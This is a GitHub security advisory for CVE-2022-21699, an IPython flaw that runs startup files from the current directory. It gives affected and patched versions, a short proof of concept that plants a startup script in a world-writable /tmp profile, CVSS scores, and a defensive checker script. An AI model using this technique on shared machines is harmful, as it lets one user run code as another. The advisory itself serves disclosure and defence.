Execution with Unnecessary Privileges in ipython

High severity GitHub Reviewed Published Jan 19, 2022 in ipython/ipython • Updated Feb 3, 2023

Package

ipython (pip)

Affected versions

< 5.11
>= 6.0.0, < 7.16.3
>= 7.17.0, < 7.31.1
>= 8.0.0, < 8.0.1

Patched versions

5.11
7.16.3
7.31.1
8.0.1

Description

We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in the current working directory (CWD). This vulnerability allows one user to run code as another.

Proof of concept

User1:

mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py

User2:

cd /tmp
ipython

User2 will see:

Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets

Patched release and documentation

See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699

Versions 8.0.1 and 7.31.1 are recommended for current Python versions.
Version 7.16.3 has also been published for Python 3.6 users,
and version 5.11 (source only, 5.x branch on GitHub) for older Python versions.
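
An added example, not taken from the advisory or the IPython project: a Python check that tests a version string against the affected ranges listed above and flags a profile_default directory in the current directory that another user owns or can write to. The function names and the ownership/permission heuristic are assumptions of this example, not IPython's fix.

```python
import os
import re
import stat

# Affected ranges copied from this advisory: (inclusive lower, exclusive upper).
AFFECTED = [
    ((0, 0, 0), (5, 11, 0)),
    ((6, 0, 0), (7, 16, 3)),
    ((7, 17, 0), (7, 31, 1)),
    ((8, 0, 0), (8, 0, 1)),
]

def parse_version(text):
    """Leading numeric release as a 3-tuple; pre-release suffixes are ignored."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(g or 0) for g in m.groups())

def is_affected(version):
    """True when the version falls inside one of the advisory's ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED)

def risky_cwd_profile(cwd, uid):
    """Say why <cwd>/profile_default should not be trusted, or return None.

    Heuristic of this example: flag the directory or its startup/
    subdirectory when it is owned by another uid or is group/world-writable.
    """
    for rel in ("profile_default", os.path.join("profile_default", "startup")):
        path = os.path.join(cwd, rel)
        try:
            st = os.stat(path)
        except OSError:
            continue  # not present (or unreadable): nothing to report here
        if st.st_uid != uid:
            return f"{path} is owned by uid {st.st_uid}"
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return f"{path} is group- or world-writable"
    return None

if __name__ == "__main__":
    # 7.29.0 is the version shown in the proof-of-concept output above.
    print("7.29.0 affected:", is_affected("7.29.0"))
    finding = risky_cwd_profile(os.getcwd(), os.getuid())
    print(finding or "no untrusted profile_default in the current directory")
```
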

References

@Carreau published to ipython/ipython Jan 19, 2022
Reviewed Jan 19, 2022
Published by the National Vulnerability Database Jan 19, 2022
Published to the GitHub Advisory Database Jan 21, 2022
Last updated Feb 3, 2023

Severity

High (8.3 / 10)

CVSS base metrics

Attack vector: Local
Attack complexity: Low
Privileges required: Low
User interaction: Required
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVE ID

CVE-2022-21699

GHSA ID

GHSA-pq7m-3gw7-gq5x
